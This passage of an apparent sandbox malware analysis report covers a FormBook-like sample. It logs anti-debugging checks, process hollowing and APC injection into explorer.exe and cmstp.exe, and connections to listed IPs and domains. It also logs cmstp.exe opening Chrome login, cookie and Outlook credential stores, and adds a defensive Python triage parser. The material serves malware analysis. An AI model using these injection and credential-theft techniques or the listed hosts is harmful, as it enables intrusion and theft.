Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B9A537 mov eax, dword ptr fs:[00000030h] 3_2_00B9A537
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B44D3B mov eax, dword ptr fs:[00000030h] 3_2_00B44D3B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3C577 mov eax, dword ptr fs:[00000030h] 3_2_00B3C577
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B37D50 mov eax, dword ptr fs:[00000030h] 3_2_00B37D50
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B53D43 mov eax, dword ptr fs:[00000030h] 3_2_00B53D43
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B93540 mov eax, dword ptr fs:[00000030h] 3_2_00B93540
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BC3D40 mov eax, dword ptr fs:[00000030h] 3_2_00BC3D40
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00BE0EA5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B946A7 mov eax, dword ptr fs:[00000030h] 3_2_00B946A7
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAFE87 mov eax, dword ptr fs:[00000030h] 3_2_00BAFE87
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B276E2 mov eax, dword ptr fs:[00000030h] 3_2_00B276E2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B416E0 mov ecx, dword ptr fs:[00000030h] 3_2_00B416E0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8ED6 mov eax, dword ptr fs:[00000030h] 3_2_00BE8ED6
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B58EC7 mov eax, dword ptr fs:[00000030h] 3_2_00B58EC7
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B436CC mov eax, dword ptr fs:[00000030h] 3_2_00B436CC
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BCFEC0 mov eax, dword ptr fs:[00000030h] 3_2_00BCFEC0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BCFE3F mov eax, dword ptr fs:[00000030h] 3_2_00BCFE3F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1E620 mov eax, dword ptr fs:[00000030h] 3_2_00B1E620
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4A61C mov eax, dword ptr fs:[00000030h] 3_2_00B4A61C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1C600 mov eax, dword ptr fs:[00000030h] 3_2_00B1C600
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B48E00 mov eax, dword ptr fs:[00000030h] 3_2_00B48E00
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1608 mov eax, dword ptr fs:[00000030h] 3_2_00BD1608
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00B3AE73
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2766D mov eax, dword ptr fs:[00000030h] 3_2_00B2766D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h] 3_2_00B27E41
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDAE44 mov eax, dword ptr fs:[00000030h] 3_2_00BDAE44
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B28794 mov eax, dword ptr fs:[00000030h] 3_2_00B28794
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B97794 mov eax, dword ptr fs:[00000030h] 3_2_00B97794
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B537F5 mov eax, dword ptr fs:[00000030h] 3_2_00B537F5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4E730 mov eax, dword ptr fs:[00000030h] 3_2_00B4E730
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3B73D mov eax, dword ptr fs:[00000030h] 3_2_00B3B73D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B14F2E mov eax, dword ptr fs:[00000030h] 3_2_00B14F2E
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3F716 mov eax, dword ptr fs:[00000030h] 3_2_00B3F716
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAFF10 mov eax, dword ptr fs:[00000030h] 3_2_00BAFF10
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE070D mov eax, dword ptr fs:[00000030h] 3_2_00BE070D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4A70E mov eax, dword ptr fs:[00000030h] 3_2_00B4A70E
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2FF60 mov eax, dword ptr fs:[00000030h] 3_2_00B2FF60
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8F6A mov eax, dword ptr fs:[00000030h] 3_2_00BE8F6A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2EF40 mov eax, dword ptr fs:[00000030h] 3_2_00B2EF40
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040CF93 LdrLoadDll, 3_2_0040CF93
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_004018B6 SetUnhandledExceptionFilter, 1_2_004018B6
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401754
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0040632B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040632B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_00401BB3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00401BB3

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 85.187.128.34 80
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe Domain query: www.un-object.com
Source: C:\Windows\explorer.exe Domain query: www.energyservicestation.com
Source: C:\Windows\explorer.exe Network Connect: 78.141.192.145 80
Source: C:\Windows\explorer.exe Domain query: www.white-hat.uk
Source: C:\Windows\explorer.exe Domain query: www.thewildphotographer.co.uk
Source: C:\Windows\explorer.exe Domain query: www.shapshit.xyz
Source: C:\Windows\explorer.exe Network Connect: 192.185.17.12 80
Source: C:\Windows\explorer.exe Domain query: www.thedivinerudraksha.com
Source: C:\Windows\explorer.exe Network Connect: 199.192.30.147 80
Source: C:\Windows\explorer.exe Domain query: www.bitservicesltd.com
Source: C:\Windows\explorer.exe Domain query: www.younrock.com
Source: C:\Windows\explorer.exe Domain query: www.gritslab.com
Source: C:\Windows\explorer.exe Network Connect: 161.97.163.8 80
Source: C:\Windows\explorer.exe Domain query: www.222ambking.org
Source: C:\Windows\explorer.exe Network Connect: 81.17.29.149 80
Source: C:\Windows\explorer.exe Domain query: www.fclaimrewardccpointq.shop
Source: C:\Windows\explorer.exe Network Connect: 94.176.104.86 80
Source: C:\Windows\explorer.exe Network Connect: 213.145.228.111 80
Source: C:\Windows\explorer.exe Network Connect: 72.14.185.43 80
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 12A0000
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\mcwfy.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Thread register set: target process: 3324
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 3324
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe C:\Users\user\AppData\Local\Temp\mcwfy.exe
Source: explorer.exe, 00000004.00000000.328321537.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.571846473.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000002.566841892.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320444720.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_004019C5 cpuid 1_2_004019C5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0040163B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040163B
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information

Source: Yara match File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cmstp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
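
Triage helper, added here as an example and not part of the Joe Sandbox report or of the FormBook sample itself: it parses the "Source: <process> <verb>: <details>" behaviour lines from the HIPS / PFW evasion section and the credential-access section above and derives three things an analyst reads out of them by hand: the cross-process injection chain (section mapping, APC queue, thread context set), network IOCs attributed to a binary under C:\Windows (the "system process connects to network" signature), and browser or mail credential stores read by a process that does not own them (cmstp.exe, a LOLBin, reading Chrome's Login Data). The sample lines are a constructed subset copied from this report with the trailing link text removed; the regular expressions, the CHROME_STORES list, the LEGIT_READERS set and the function names are assumptions of this example, not report conventions.

```python
"""Parse Joe Sandbox-style behaviour lines and summarise injection, C2 and credential access."""
import re
from collections import defaultdict, deque

# Constructed subset of the report's behaviour lines (link text removed; trailing
# backslash of the Outlook key dropped so the raw string stays valid Python).
SAMPLE_LINES = [
    r"Source: C:\Windows\explorer.exe Network Connect: 85.187.128.34 80",
    r"Source: C:\Windows\explorer.exe Domain query: www.un-object.com",
    r"Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 12A0000",
    r"Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\mcwfy.exe protection: execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Thread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 3324",
    r"Source: C:\Windows\SysWOW64\cmstp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook",
    r"Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
]

# "Source: <path> <verb>: <detail>"; the verb is the shortest letters-and-spaces run before ": ".
LINE_RE = re.compile(r"^Source: (?P<proc>\S+) (?P<verb>[A-Za-z ]+?): (?P<detail>.*)$")

# Where each injection-related verb names its target (assumed from the report's wording).
TARGET_RES = {
    "Section loaded": re.compile(r"target: (\S+) protection: (.+)"),
    "Section unmapped": re.compile(r"^(\S+) base address: "),
    "Thread APC queued": re.compile(r"target process: (\S+)"),
    "Thread register set": re.compile(r"target process: (\S+)"),
}
CHROME_STORES = ("Login Data", "Cookies", "Web Data", "Local State")  # assumed list
MAIL_KEY = "Windows Messaging Subsystem\\Profiles"                      # Outlook profile hive
LEGIT_READERS = {"chrome.exe", "outlook.exe"}                           # assumed owners


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(lines):
    """Turn report lines into event dicts; non-matching lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append({"path": m["proc"], "proc": _basename(m["proc"]),
                           "verb": m["verb"], "detail": m["detail"]})
    return events


def injection_edges(events):
    """(source, target, verb) for cross-process memory/thread tampering; self-maps dropped."""
    edges = set()
    for ev in events:
        rx = TARGET_RES.get(ev["verb"])
        m = rx.search(ev["detail"]) if rx else None
        if not m:
            continue
        raw = m.group(1)
        target = _basename(raw) if "\\" in raw else f"pid:{raw}"  # bare PID when no path
        if target != ev["proc"]:
            edges.add((ev["proc"], target, ev["verb"]))
    return edges


def injection_chain(edges, start="mcwfy.exe"):
    """Processes reachable from `start` through injection edges, in discovery order."""
    seen, order, queue = {start}, [], deque([start])
    while queue:
        src = queue.popleft()
        for s, t, _ in sorted(edges):
            if s == src and t not in seen:
                seen.add(t); order.append(t); queue.append(t)
    return order


def system_process_network(events):
    """Connections and DNS queries made by binaries under C:\\Windows, grouped by process."""
    out = defaultdict(lambda: {"ips": set(), "domains": set()})
    for ev in events:
        if not ev["path"].lower().startswith("c:\\windows\\"):
            continue
        if ev["verb"] == "Network Connect":
            ip, port = ev["detail"].split()
            out[ev["proc"]]["ips"].add(f"{ip}:{port}")
        elif ev["verb"] == "Domain query":
            out[ev["proc"]]["domains"].add(ev["detail"].strip())
    return dict(out)


def credential_access(events):
    """(process, store) pairs where a non-owner process opened a browser or mail credential store."""
    hits = set()
    for ev in events:
        if ev["proc"] in LEGIT_READERS:
            continue
        d = ev["detail"]
        if ev["verb"] == "File opened" and "\\Google\\Chrome\\User Data\\" in d:
            name = d.rsplit("\\", 1)[-1]
            if name in CHROME_STORES:
                hits.add((ev["proc"], "chrome:" + name))
        elif ev["verb"] == "Key opened" and MAIL_KEY in d:
            hits.add((ev["proc"], "outlook-profile-registry"))
    return hits


def triage(lines):
    """One-shot summary of the three findings for a list of report lines."""
    events = parse_events(lines)
    edges = injection_edges(events)
    return {"injection_chain": injection_chain(edges),
            "system_process_network": system_process_network(events),
            "credential_access": sorted(credential_access(events))}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LINES).items():
        print(key, value)
```

On the full report the same functions flag every explorer.exe connect and domain query as C2 candidates (FormBook rotates through a list of decoy and real domains, so not every hit is live infrastructure), and the chain dropped-file -> explorer.exe -> cmstp.exe is what the "process hollowing" and "queues an APC in another process" signatures describe.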

Remote Access Functionality

Source: Yara match File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
[IP geolocation map not reproduced; legend buckets: No. of IPs < 25%, 25% to 50%, 50% to 75%, > 75%]